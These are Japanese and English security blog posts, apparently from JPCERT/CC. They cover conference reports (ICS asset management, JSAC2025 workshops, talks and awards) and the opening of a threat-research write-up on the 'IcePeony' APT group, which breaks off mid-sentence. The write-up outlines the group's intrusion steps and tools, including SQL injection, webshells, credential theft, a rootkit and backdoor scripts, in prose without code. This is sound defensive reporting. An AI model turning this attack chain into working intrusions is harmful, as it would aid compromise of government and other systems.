一般社団法人JPCERTコーディネーションセンター 国内コーディネーショングループ制御システムセキュリティシニアアナリスト河野一之 <a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_07_JPCERTCC.pdf" target="_blank" rel="noopener">講演資料</a><a href="https://www.jpcert.or.jp/present/2025/ICSSConf2025_07_JPCERTCC.pdf" target="_blank" rel="noopener"></a> 脆弱性対応を進めるための課題の一つにセキュリティ観点での資産管理をどのように行うのかという点があります。本講演では、適切な管理手法に取り組んだ成果や今後の課題等について、越智氏と田中氏から発表いただいた上で、両名を含む3人のパネラーによるパネルディスカッションを行いました。 まず初めに、JPCERT/CCから昨今の脆弱性対応における課題について話しました。今や制御システムにおけるセキュリティの重要性を認識して対策に取り組んでいる組織は増えており、対策の一環として脆弱性情報の収集も取り組まれています。しかし、脆弱性情報の収集を行っても十分に活用できていない制御システムユーザー組織が相当数あるのではないかということを述べました。 次に、越智氏から、制御システム関連の脆弱性情報を自組織の資産と突合する取り組みを試みた複数の製造業の組織において、突合するための資産管理が不十分であるという課題が背景にあることが判明したこと、資産管理がセキュリティ対策において重要であり、「やるべきこと」として記載しているガイドはすでに存在するものの、肝心のどのようにすれば脆弱性対応のための「セキュリティ観点での適切な資産管理」となるのかという手法に対する考え方や具体的な手順等は各組織任せとなっており、「制御系SIRT」等の制御システムセキュリティを担当する実務者が手探りで行っていること等の課題があることが述べられました。その上で、上述のICSセキュリティ担当者コミュニティーで複数の製造業のセキュリティ担当者とともに本年度取り組んだ資産管理の考え方等について述べられました。具体的には、「事業被害リスク」を低減することを目的に脆弱性対応を行う必要があり、その観点での資産管理における一つのアプローチとして、ビジネスインパクトを想定した場合の資産の重要度を判断軸にして、その管理手法の検討に取り組んだことが紹介されました。こうした視点で資産を整理することで、はじめからすべての資産の情報を集めなければならないというハードルを下げつつ、まずは事業影響を下げる重要な資産から取り組むこととなり、実務者の作業負荷軽減にもつながる現実的な手法であることも述べられました。 次に、田中氏から、検討した管理手法において、プロセスには「プロセスⅠ（事業・業務の重要度判定）」「プロセスⅡ（資産の重要度判定）」「プロセスⅢ（セキュリティ要件の付与）」「プロセスⅣ（脆弱性情報の突合）」の4つがあること、そのうち、本年度に取り組んだ「プロセスⅠ（事業・業務の重要度判定）」「プロセスⅡ（資産の重要度判定）」の詳細な手順について、その資産管理表のフォーマットも示しつつ、具体的に各プロセスで実施したこと等が紹介されました。「プロセスⅠ（事業・業務の重要度判定）」においては、事業リスクをベースに各事業や業務の重要度を判定しますが、どの事業リスクがどの程度のビジネスインパクトとなるのか等、各事業リスクに対する重み付けは事業者によって異なるため、検討に参加した3業種の組織や上述のICSセキュリティ担当者コミュニティーの他の業種の組織の方々においてもリスクと認識されるケースを例示して進めたこと、「プロセスⅡ（資産の重要度判定）」では、プロセスⅠで判定した重要度の高い事業・業務の中で、それに関連する資産の中で、さらに当該資産が異常を来した際に想定される悪影響をベースにした重みづけを設定して、各資産の重要度を判定すること等の手順が紹介されました。実際に自組織内で進めていた資産情報の収集に照らして、資産情報を現場担当者に適切に報告してもらうための工夫等も一部紹介を交え、これらのプロセスの進め方を述べられました。 以上の発表の後、次のテーマ等で、JPCERT/CCがファシリテーターを務め、越智氏と田中氏から回答をいただきました。質疑応答の概要は次のとおりでした。 ● 今回紹介した資産管理手法で実際にやってみていかがでしたか？ <ul> <li style="box-sizing: border-box;">単にツールを使って資産情報を自動収集するというのではなく、制御システムの資産は物理的な世界との接点になるという点で、今回の事業リスクを想定した手法には多くの気付きがありました。</li> <li>事業リスクを想定した資産の整理はできていなかったため、自組織で取り組んでいる資産管理に取り込んでいきたいと考えています。</li> </ul> ● 紹介した資産管理手法で入手した脆弱性情報との突合は可能と思われますか？ <ul> <li>脆弱性情報の突合を実施してみると収集した資産情報と突合がうまくいくのか不安でしたが、思いのほか突合できました。ただし、資産の表記揺れがあり、突合のための準備に課題があることが分かりました。</li> <li>膨大な資産情報があり、それを突合するには相当大変だと思っていたため、今回の手法のように絞り込んで行うと突合しやすいことが分かりました。</li> </ul> ● 紹介した資産管理で脆弱性対応を適切に進められそうとお感じでしょうか？ <ul> <li>進めやすくなると思われます。一気にすべてを把握できるわけではないので、この手法で繰り返しつつ進めて、ノウハウを積み上げて行くことが大事であると考えています。</li> <li>一つのアプローチとして有効だと考えています。こうした取り組みは現場の協力が不可欠であり、少ない労力で効果を最大にしたいとの想いは担当者として考えるところです。また、事業リスクベースとしていることで、なぜこの脆弱性は対応しないのか等の説明を経営層等に求められても説明しやすくなる点もあり、有効だと考えています。 </li> </ul> <img class="asset asset-image at-xid-3640598 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_08-640wri.png" alt="パナソニックオートモーティブシステムズ株式会社開発本部プラットフォーム開発センターセキュリティ開発部係長　越智直紀氏、日本精工株式会社デジタル変革本部 ITガバナンス部担当課長　田中哲也氏、 JPCERT/CC 国内コーディネーショングループ制御システムセキュリティシニアアナリスト　河野一之" width="640" height="330"> <h2> </h2> <h3>閉会あいさつ</h3> 一般社団法人JPCERTコーディネーションセンター理事椎木孝斉 閉会あいさつはJPCERT/CC理事の椎木が行いました。 2009年に始まり第17回目を迎えた本カンファレンスでは、5年ぶりに会場開催を復活させ、ハイブリッド形式で開催しましたが、こうした開催形態に関する参加者からのフィードバックをまずはお願いしました。制御セキュリティに対する業界の関心が、カンファレンスをはじめた2009年からは大きく変化し、制御システムセキュリティに関わる人が増え、より身近になっていること、そのような状況の中、JPCERT/CCも含む複数の組織が相互に連携し協働的に取り組むことが不可欠であることを述べました。 さらに、本カンファレンスにおいては、取り組むべき課題は大きくても、その中で現場の担当者が協力しあいながら、ステップバイステップで進んでいく、そのための次の一手につながるものを届けたいということを考えカンファレンスを企画してきたこと、またこのカンファレンスを手段として、皆さんの取り組みの次のアクションにつなげていって欲しいと述べるとともに、改めて講演者および全参加者に対して謝意を表して締めくくりとしました。 <img class="asset asset-image at-xid-3646918 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/icssconf2025_09_1-640wri.png" alt="一般社団法人JPCERTコーディネーションセンター理事　椎木孝斉" width="640" height="328"> <h3>おわりに</h3> 今回の制御システムセキュリティカンファレンスでは、制御システムセキュリティを取り巻く状況について、国際標準規格、制御システムベンダー、セキュリティベンダー、ユーザー企業などさまざまな立場からご講演いただきました。本カンファレンスが、制御システムに関わる聴講者の皆さまにとって、今後の活動の参考となればなによりです。今後も開催内容を改善しつつ、国内の制御システムセキュリティの向上に資する情報の発信や知見の共有に努めて参りたいと思います。 ここまで制御システムセキュリティカンファレンス2025の開催レポートをお読みいただき、ありがとうございました。 次回の開催もご期待ください。 国内コーディネーショングループ織戸由美
JSAC2025 開催レポート～Workshop & Lightning Talk～

Wed, 12 Mar 2025 04:00:00 -0000

第2回のJSAC2025 2日目のMain Trackの紹介に引き続き、第3回はJSAC2025で行われたWorkshopとLightning Talkについて紹介します。

第2回のJSAC2025 2日目のMain Trackの紹介に引き続き、第3回はJSAC2025で行われたWorkshopとLightning Talkについて紹介します。 <h1>Workshop</h1> <h2>Handling Threat Intelligence: Techniques of Consuming and Creating Threat Intelligence</h2> 講演者：東京海上ホールディングス石川朝久、大徳達也、富山寛之 <a href="https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_ws1_ishikawa_daitoku_tomiyama_jp.pdf">講演資料（日本語）</a> 石川氏、大徳氏、富山氏は、脅威インテリジェンスの基礎から実践的な活用方法まで体系的に解説し、脅威インテリジェンスを実践的に活用したワークショップを実施しました。 はじめに、脅威インテリジェンスの基礎的な概念について説明しました。脅威は「意図×能力×機会」という3要素で特徴づけられ、インテリジェンスはデータ形式とプロセスという2つの観点から捉えることができると解説しました。また、効果的な脅威インテリジェンスには、正確性（Accurate）、利用者目線（Audience Focused）、実行可能性（Actionable）、適切なタイミング（Adequate Timing）という4つの要件が重要であると説明しました。 次に、実践的なアプローチとして、Tactical IntelligenceとOperational Intelligenceについて詳述しました。 Tactical Intelligenceでは、SOC担当者向けのインテリジェンスとして、IoCを活用した予防・検知・対応について解説しました。具体的には、OSINTやSIGINTによる情報収集から始まり、収集したIoCの評価・分析・充実化を経て、YARAルールやSIGMAルールの適用・配布まで、体系的な手法を示しました。また、IoCの有効性と制約について次のように言及しました。 IoCはシグニチャ化されていない業界固有の脅威を予防・発見できる一方で、その鮮度は数時間から数日程度と短く、時間経過とともに有効性が薄れていくことから、IoCの情報量と鮮度を考慮したスクリプトによる自動化の重要性や、コンテキストを正しく理解した上での活用が必要であるとのことです。 Operational Intelligenceでは、セキュリティアーキテクト・管理者・SOC担当者向けのインテリジェンスとして、攻撃者のプロファイルや攻撃手法を包括的に理解し、組織のセキュリティ改善に活用する手法について解説しました。 MITRE ATT&CKフレームワークを活用したTTPsの分析や、MITRE D3FENDフレームワークによる防御手法の体系化などを説明しました。これらの攻撃手法に関する脅威インテリジェンスを活用して、「予防できるものは予防し、予防できないものは検知し、検知できないものはハントする」という考え方に基づいたDefensive Architectureの構築方法について述べました。また、脅威分析プロセスとして、OSINTやSIGINTによる情報収集から始まり、収集した情報を分析して脅威シナリオを作成し、それをPurple TeamingやThreat Huntingに応用するという体系的なアプローチを説明しました。 Threat Huntingについては、既存のセキュリティ対策を回避する脅威を能動的に発見する手法として、仮説構築（Hypothesis）、調査対象（Object）、調査手法（Procedure）、判断基準（Evaluation）という4つの観点から検証可能な仮説を構築することの重要性について言及しました。さらに、検知の堅牢性を向上させるSummit The Pyramid（STP理論）を紹介し、正確性（高い検知精度と再現率）と耐性（時間経過に対する攻撃者の回避能力への耐性）の両面から検知ルールを評価・改善する方法論を説明しました。 最後に、脅威インテリジェンスの共有の重要性について説明しました。特に、組織単独でのインテリジェンス収集には限界があることから、インテリジェンスコミュニティーを通じた情報共有が重要とのことです。また、TLPを用いた適切な情報共有や、Confidence LevelとEstimative Languageを活用したインテリジェンスの確度の表現について言及しました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_workshop1_1-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642403 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_workshop1_2-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642405 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <h2>Malware config extraction at scale – building malware analysis pipelines</h2> 講演者：CERT Polska Michał Praszmo <a href="https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_ws2_micha%C5%82-praszmo_en.pdf">講演資料（英語）</a> Praszmo氏は、CERT Polskaでの長年のマルウェア分析プロジェクトを通じて開発された、マルウェアの設定情報の自動抽出のツールについて、ワークショップを実施しました。 はじめに、マルウェア分析用のリポジトリーであるMWDBについて解説しました。 MWDBは自動分析を想定して設計された拡張性の高いシステムで、マルウェア、設定、その他のデータを保存するためのコアオブジェクトタイプ、タグやコメント、属性などを付与できるセカンダリオブジェクト、そしてLuceneクエリによる柔軟な検索機能があるとのことです。また、CLIやPython API、REST APIを通じた自動化も可能とのことです。 次に、マルウェア分析のためのPythonモジュールであるmalduckについて解説しました。 malduckは、暗号化機能や圧縮アルゴリズム、メモリダンプやPE/ELFファイルの操作、設定抽出エンジンなど、一般的に使用される分析ヘルパー機能があると言及しました。具体的な抽出の仕組みとして、YARAルールを使用してパターンマッチングを行い、マッチした箇所からC2サーバーのURLなど、マルウェアの特徴的な情報を抽出する手法を説明しました。 最後に、分散マルウェアプロセッシングフレームワークであるKartonについて紹介しました。 Kartonは、MWDBとmalduckを組み合わせて分析パイプラインを構築するためのフレームワークとのことです。各サービスがそれぞれの役割を果たし、マルウェアの分類、アーカイブの展開、設定の抽出などを自動的に行うことができると解説しました。実際の運用例として、フィッシング報告の分析など、マルウェア分析以外の用途にも活用されていると言及しました。 ハンズオンでは、MWDBの基本的な使い方から始まり、段階的にツールの理解を深めていく演習を実施しました。具体的には、タグを使用したマルウェアのフィルタリング、マルウェアの詳細表示と階層構造の理解、類似した設定の検索方法、そしてblobの扱い方まで、実際のマルウェア分析シナリオに沿って実践的な演習を行いました。 なお、本ツールは以下のGitHubリポジトリーで公開されています。 MWDB：<a href="https://github.com/CERT-Polska/mwdb-core" title="">https://github.com/CERT-Polska/mwdb-core</a> Malduck：<a href="https://github.com/CERT-Polska/malduck" title="">https://github.com/CERT-Polska/malduck</a> Karton：<a href="https://github.com/CERT-Polska/karton" title="">https://github.com/CERT-Polska/karton</a> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_workshop2-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642406 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <h2>IDAとGhidraのプラグインを活用して学ぶ、マルウェアの耐解析機能解析入門</h2> 講演者：LAC株式会社武田貴寛 <a href="https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_ws3_takeda_For_IDA_User_en.pdf">講演資料_IDAユーザー向け（英語）</a> <a href="https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_ws3_takeda_For_Ghidra_User_en.pdf">講演資料_Ghidraユーザー向け（英語）</a> 武田氏は、マルウェアに含まれるアンチデバッグ機能を自動的に識別するツールであるAntiDebugSeekerについて、ワークショップを実施しました。 はじめに、マルウェア解析において通信先の特定などの目的を持って解析を進める際、途中でアンチデバッグ機能に遭遇すると解析が停止してしまい、目的の達成が困難になることがあると説明しました。このような課題に対応するため、AntiDebugSeekerは開発されたと述べました。このツールは解析の中断を防ぎ、効率的な解析の継続を支援することが可能であると言及しました。 次に、AntiDebugSeekerの主要な機能として、マルウェアによって使用される可能性のあるアンチデバッグ用APIの抽出機能と、キーワードをトリガーとして使用することでAPI呼び出しのみでは識別できないアンチデバッグ機能を抽出する機能について説明しました。また、パックされたマルウェアの場合は、アンパックおよびインポートアドレステーブルの修正後に本ツールを実行することで、より効果的な解析が可能であると言及しました。 そして、AntiDebugSeekerの具体的な使用方法について、実際のマルウェアを用いてデモンストレーションを行いました。ツールの実行結果として表示される検出項目には、メモリ操作に関連する情報やアンチデバッグ機能を持つ関数の特定などが含まれることを解説しました。また、検出結果から特定の関数へジャンプする機能や、検出ルールの詳細を確認できる機能など、解析を効率的に進めるための機能についても説明を行いました。 ハンズオンでは、基本的なアンチデバッグ機能の解析から始まり、次に複合的な耐解析機能の解析を行い、さらにプロセス挙動の詳細解析を実施しました。また、マルウェアによるVMware環境の検知を例に、AntiDebugSeekerの設定ファイルをカスタマイズして新たな検知ルールを実装する手法を実践しました。 最後に、本ツールが持つ検知ルールのカスタマイズ性の高さにより、新たな耐解析手法への対応や、独自の検知ルールの追加が可能であることも示されました。 なお、本ツールは以下のGitHubリポジトリーで公開されています。 IDA版：<a href="https://github.com/LAC-Japan/IDA_Plugin_AntiDebugSeeker" title="">https://github.com/LAC-Japan/IDA_Plugin_AntiDebugSeeker</a> Ghidra版：<a href="https://github.com/LAC-Japan/Ghidra_AntiDebugSeeker" title="">https://github.com/LAC-Japan/Ghidra_AntiDebugSeeker</a> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_workshop3-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642407 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <h1>Lightning Talk</h1> <h2>複数のLLM agentとRAGによるMITRE ATT&CK利活用ツールの紹介</h2> 講演者：佐田淳史 <a href="https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_LT1_sada.pdf">講演資料（英語）</a> 佐田氏は、セキュリティ分野におけるLLMの活用、特にMITRE ATT&CKフレームワークを用いて開発したツール「disarmBot」について講演しました。 disarmBotは、Microsoftが開発するOSSのAIエージェントフレームワークであるAutoGenを活用し、複数のAIエージェントが協調して動作するシステムとして実装されたボットとのことです。 はじめに、昨今のLLMとAI技術の急速な発展を踏まえ、セキュリティとインシデントレスポンスの分野におけるLLM活用の重要性について述べました。 次に、AutoGenフレームワークの特徴について解説しました。 AutoGenは３つの実行パターン（Two Agent Chat、Sequential Chat、Group Chat）を持ち、本ツールではGroup Chatモードを採用することで、複数のエージェントによる多角的な議論を実現したと説明しました。 disarmBotシステムのコア機能として、以下の5つの特殊なエージェントによる協調システムを構築したと言及しました。 <ol> <li>Attacker Side：攻撃者の視点で分析を行い、RedチームのTTPを参照して議論を実施</li> <li>Defender Side：防御者の視点で分析を行い、BlueチームのTTPを参照して議論を実施</li> <li>OSINT Specialist：インターネット上の情報を収集・要約して議論を実施</li> <li>Skeptics：他のエージェントの発言に対して批判的な視点で議論を実施</li> <li>Solution Architect：エージェントの情報を統合して最終的な解決策を提示</li> </ol> disarmBotの技術的な実装においてDISARM TTPフレームワークについて説明しました。このフレームワークはMITRE ATT&CKの設計思想を踏襲し、偽情報インシデントの記述と理解のために開発されたものです。フェーズ、戦術、テクニック、タスク、対策などの階層構造で体系化され、RedチームとBlueチームの両方の視点を含む包括的なフレームワークとなっています。 このフレームワークを効果的に活用するため、disarmbotは以下の要素を統合したアーキテクチャを採用したと説明しました。 <ul> <li>RAG（Retrieval-Augmented Generation）技術による効率的な情報検索</li> <li>Chroma DBを用いたベクトルデータベースの構築</li> <li>DISARM TTPフレームワークのドキュメントの活用</li> <li>OpenAI APIまたはAzure OpenAI APIの利用</li> <li>Discord Platform上での動作環境の実現</li> </ul> 最後に、ボットが生成した回答に対する利用者の責任の重要性を強調しました。また、このプロアクティブなアプローチを用いたツールは、データベースやプロンプトの置き換えにより、ペネトレーションテストやDFIRなどの他の用途にも活用できる可能性があると述べました。 なお、本ツールは日本語・英語・中国語に対応しており、以下のGithubリポジトリーで公開されています。 <a href="https://github.com/ultra-supara/disarmBot" title="">https://github.com/ultra-supara/disarmBot</a> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_LT1-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642399 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <h1>日本とスペインのサイバーセキュリティ分野における国際協力</h1> 講演者：キヤノンITソリューションズ池上真人、ESET Spain Josep Albors <a href="https://jsac.jpcert.or.jp/archive/2025/pdf/JSAC2025_LT2_masato_josep.pdf">講演資料（英語）</a> 池上氏とAlbors氏は、地理的に離れた日本とスペインにおけるサイバー攻撃の共通点と両国間の協力について講演しました。 はじめに、両国で観測される情報窃取マルウェアの動向について説明がありました。多くの攻撃キャンペーンは両国でほぼ同時期に発生しており、特にスペインでは11月中旬に特徴的なピークが観測されていると言及しました。この特徴はクリスマス商戦やブラックフライデーなどが日本よりポピュラーであることから、マルウェアの運営者がそれらを狙ってキャンペーンを展開しているためと説明しました。 次に、両国で猛威を振るった情報窃取マルウェアの1つとしてEmotetの事例が紹介されました。 Emotetは主にメールによって拡散されていたと言及しました。パスワード付きZIPファイルによる文書共有（PPAP）は、日本特有の文化と考えられていましたが、これを悪用した攻撃はスペインでも同様の事例が確認されているとのことです。 そして、詐欺サイトに関しては、スペインで先行して検出されるパターンが多いことに言及しました。これはスペイン語圏のインターネット人口の多さやローカライズコストの影響によるものと説明しました。 また、テックサポート詐欺についても言及がありました。スペインでは2012年から観測され、当初はスペイン語のみの基本的なWebサイトでしたが、後に英語やスペイン語で電話をかけるテックサポート詐欺の展開も確認されていると説明しました。最近ではいくつものテクニックを組み合わせて手口が巧妙化していると述べました。そして、日本で観測されているテックサポート詐欺と類似のテックサポート詐欺がスペインでも確認されているとのことです。 最後に、両氏は国際的な脅威インテリジェンス共有の重要性を強調しました。具体例として、2024年2月に締結されたJPCERT/CCとINCIBEの協力協定や、MISPを活用した脅威情報共有の取り組みを紹介しました。地域特有の状況を考慮しつつ、国際協力を通じてサイバーセキュリティ対策を強化していくことの重要性が述べられました。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_LT2_1-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642400 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_LT2_2-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642401 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <h1>各賞の受賞者発表</h1> JSAC2025では、発表いただいたセッションの中から素晴らしい情報を共有いただいたセッションの表彰を行っています。 Excellent Presentation Award（旧ベストスピーカー賞）は、参加者の皆さまからいただいたアンケート結果によってExcellent（非常に満足）評価が最も高かったセッションを選出しています。 Special Recognition Awardは、CFPレビューボードの話し合いによって決定しています。 Excellent Presentation AwardおよびSpecial Recognition Awardに選ばれた発表は、以下のとおりです。 Excellent Presentation Award タイトル：Hack The Sandbox: Unveiling the Truth Behind Disappearing Artifacts 講演者：伊藤忠サイバー＆インテリジェンス株式会社亀川慧、笹田修平、丹羽祐介 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_epa-640wri.jpg" width="543" height="360" alt="" class="asset asset-image at-xid-3642398 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> 本発表は、最新の脅威に対する対策・調査手法についての調査結果についての発表であり、実用性が高い点が評価されました。 受賞者からのコメント <pre style='padding: 10px 10px; white-space: pre-wrap; width: 650px;color:#1F1F1F;background:#d1d1d1;overflow: auto;'> 攻撃者は常に私たちの先を行こうとします。ブルーチームである私たちは、その厳しい現実を受け止めながら、試行錯誤を重ねて守り抜かなければなりません。今回の発表は、現時点で得られた知見の共有にすぎず、完璧な答えを示すものではありません。しかし、粘り強く課題に取り組み、地道に「泥臭く」答えを追い求め続ける姿勢こそが、最前線のセキュリティ対策を底支えする礎となります。今回取り上げた内容も未知の要素が多くありましたが、多角的に仮説を立て、一つ一つ丁寧に検証を行いながら攻撃者の足取りを追いかけるとともに、調査方法や対策について何度も議論を重ねました。その成果を皆様に高く評価いただけたことは、大変光栄に思います。サイバーセキュリティの領域では、個々の知識や努力が大切である一方、共に知恵を絞り、力を合わせることが何よりも重要です。私たちの身の回りには、つい見逃してしまいがちな気づきや手がかりが数多く隠れているかもしれません。それらの兆候を見逃さずに洞察を得ることが、大きな発見へと結びつき、新たな対策を導き出す「鍵」となるのではないでしょうか。そして、このように発掘された小さな「タネ」をアナリスト同士が互いに共有し、理解を深め合うことこそが、JSACの趣旨であると考えています。ひいては、その取り組みが社会全体のサイバーセキュリティ向上にもつながると信じています。 </pre> Special Recognition Award タイトル：不正送金に係るフィッシング犯行グループの観測とみずほの対策 講演者：株式会社みずほフィナンシャルグループ八子浩之、竹内司、遠藤拓也 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/JSAC2025_sra-640wri.jpg" width="640" height="360" alt="" class="asset asset-image at-xid-3642402 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> 本発表は、これまであまり公開されることがなかったフィッシング攻撃のターゲットとなった組織の対策事例として、多くの学びが得られたことが評価されました。 受賞者からのコメント <pre style='padding: 10px 10px; white-space: pre-wrap; width: 650px;color:#1F1F1F;background:#d1d1d1;overflow: auto;'> 八子浩之 JSACという素晴らしい舞台で、このような名誉ある賞をいただいたことについて、多くの皆様に心から感謝申し上げます。支えてくれた多くのメンバーと一緒に取り組めた成果だと思っています。フィッシングに対して同じ課題を抱える組織との共同防衛の取り組みについても、これからも一層気を引き締めて進めていきたいと思っています。竹内司 JSACという公の舞台で発表の機会をいただけたこと、さらに貴重な賞をいただけたことに感謝申し上げます。また、今回発表は3名でおこないましたが、ここに至るまでに多数のチームメンバーや関係部署などの協力があり、「今」に辿り着くことができました。関係者皆様に改めて御礼を申し上げます。PhishingのみならずCyber Crimeの脅威は増大しており、これからも積極的に当該分野での犯罪抑止に貢献してまいります。遠藤拓也 JSACには開催当初から聴講者で参加しており、いつか発表者として登壇したいという思いがありました。今回その念願が叶い、且つ名誉ある賞を頂き、大変光栄に思います。この成果は、弊社チーム全員の協力と支援があってこそ成し遂げられたものです。共に働いたメンバーの皆様に心から感謝申し上げます。今後もフィッシング対応に向けて、絶え間ない努力を続けてまいります。引き続きご指導、ご鞭撻のほどよろしくお願い申し上げます </pre> また、JSACでは優れた講演活動を長期にわたり継続している方々を称える目的で、殿堂入りの表彰を行っています。殿堂入りは、Excellent Presentation AwardもしくはSpecial Recognition Awardを合わせて3回受賞された方を対象として、その卓越した講演活動を称える特別な賞です。殿堂入りされた方は、JSACへの永久参加権が贈呈されます。 JSAC2025において殿堂入りされた方は、以下のとおりです。 殿堂入り 受賞者：伊藤忠サイバー＆インテリジェンス株式会社笹田修平 受賞者からのコメント <pre style='padding: 10px 10px; white-space: pre-wrap; width: 650px;color:#1F1F1F;background:#d1d1d1;overflow: auto;'> 殿堂入りという名誉をいただき、大変光栄に思います。この場をお借りして、厚く御礼申し上げます。これもひとえに、共に歩んできた仲間やこれまで支えてくださった皆様のおかげだと感じています。この感謝の気持ちを胸に、今後も精進して参りたいと思いますので、引き続きよろしくお願いいたします。 </pre> <h1>おわりに</h1> 最後に、JSAC2025にご参加いただきました皆さま、本レポートをご覧いただきました皆さまに、この場を借りしてお礼を申し上げます。 　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　早期警戒グループ石原大移紀
IcePeony with the ‘996’ work culture

Wed, 16 Oct 2024 15:00:00 -0000

This blog post is based on “IcePeony with the ‘996’ work culture” that we presented at VB2024. We are grateful to Virus Bulletin for giving us the opportunity to present. https://www.virusbulletin.com/conference/vb2024/abstracts/icepeony-996-work-culture/ tl;dr We have discovered a previously unknown China-nexus APT group, which we have named “IcePeony”. Due to operational mistakes, they exposed their resources, allowing us to uncover details of their attacks. IcePeony is a China-nexus APT group that has been active since at least 2023. They have targeted government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam. Their attacks typically start with SQL Injection, followed by compromise via webshells and backdoors. Interestingly, they use a custom IIS malware called “IceCache”. Through extensive analysis, we strongly believe that IcePeony is a China-nexus APT group, operating under harsh work conditions. IcePeony IcePeony is an unknown attack group. Our research shows that they have been active since at least 2023. They mainly target Asian countries, such as India and Vietnam. In the log files we analyzed, there were over 200 attempts to attack various government websites in India. They use SQL injection attacks on public web servers. If they find a vulnerability, they install a webshell or malware. Ultimately, their goal is to steal credentials. We believe IcePeony works for China’s national interests. It is possible that they prioritize China’s maritime strategy. Our research found that IcePeony targeted government and academic institutions in India, political parties in Vietnam, and government institutions in Mauritius. Recently, they may have also attacked Brazil. It is likely that they will expand their targets in the future. OPSEC fail In July, we identified a host that was publicly exposing various attack tools, including CobaltStrike and sqlmap, via an open directory. What made this discovery even more compelling was the presence of a zsh_history file. One of the most interesting findings was the zsh_history file. Similar to bash_history, the zsh_history file records command history. However, zsh_history also logs timestamps, allowing us to pinpoint the exact time each command was executed. This enabled us to construct a highly detailed timeline of the attack. Unlike a typical timeline created by an IR or SOC analyst, this one offers insight from the attacker’s perspective. We could observe their trial-and-error process and how they executed the intrusion. The zsh_history was not the only interesting file. There were many others. For example, IcePeony had configured several helper commands in their alias file, including shortcuts to simplify lengthy commands and commands to quickly access help information. Here is an example with Mimikatz. By typing “hPass,” the attacker could display basic tutorials for Mimikatz. This improved their effectiveness during attacks. Intrusion Timeline We obtained two weeks’ worth of command history from the zsh_history. Let’s go through the events of each day. On day-1, the attacker attempted SQL injections on several government websites. When the exploit succeeded, they installed a webshell or IceCache, establishing a foothold for the attack. On day-2, they reviewed the domain information of compromised hosts and created accounts for further exploitation. On day three, which was a Sunday, no actions were taken. On day-3, which was a Sunday, they did not perform any actions. It seems the attacker does not work on Sundays. On day-4, they used IceCache to configure proxy rules. We will explain this in more detail later. On day-5, the attacker expanded their reach by attempting more SQL injections on other government websites. On day-6, they used various tools, including IcePeony’s custom tool called StaX and a rootkit called Diamorphine. On day-7, they continued to attack other hosts using tools like URLFinder and sqlmap. On day-8, they used IceCache to steal information from the compromised environment, especially focusing on domain users. On day-9, they were quiet and only performed connection checks. On day-10, they did nothing since it was a Sunday. On day-11, they used tools like craXcel and WmiExec. They used craXcel, an open-source tool, to unlock password-protected Microsoft Office files. On day-12, they used IceCache to add proxy rules and set persistence with scheduled tasks. On day-13 and day-14, they explored other hosts for further exploitation. Over the course of two weeks, the attacker utilized a variety of tools and commands to compromise government websites and exfiltrate information. Tools IcePeony uses a wide range of tools, with a particular preference for open-source ones. Here, we will highlight only the most distinctive tools they use. StaX StaX is a customized variant of the open-source tool Stowaway, a high-performance proxy tool. The attacker enhanced Stowaway with custom processing. Based on development strings, we called this version StaX. StaX included encryption for communication targets specified in active mode using Custom Base64 and AES. ProxyChains ProxyChains is an open-source proxy tool. The attacker used ProxyChains to run script files on victim hosts. info.sh is a script that collects system information from the compromised environment. It gathers environment information, user information, installed tool versions, network settings, SSH configuration files, and command history. linux_back.sh is a script for backdoors and persistence. It downloads and runs a backdoor shell script from the server and creates backdoor users. Interestingly, they installed a rootkit called Diamorphine, which is available on GitHub. Malware The IcePeony server contained malware targeting IIS, which we named IceCache. They used IceCache to attack the attack surface server. Additionally, during the investigation, we discovered another related malware, which we called IceEvent. Although no logs of using IceEvent were found. We believe it was used to compromise another computer that was not connected to the internet. IceCache IceCache is an ELF64 binary developed in Go language. It is customized based on the open-source software reGeorge. To facilitate their intrusion operations, they added file transmission commands and command execution functionality. IceCache module is installed and run on IIS servers. The number of commands change, but they are classified into two types based on authentication tokens. We found files with remaining PDB information. These files were developed by a user named “power” in a project called “cachsess” PDB Path C:\Users\power\documents\visual studio 2017\Projects\cachsess\x64\Release\cachsess.pdb C:\Users\power\Documents\Visual Studio 2017\Projects\cachsess\Release\cachsess32.pdb The number of commands changes over time, but it includes command execution functions, SOCKS proxy functions, and 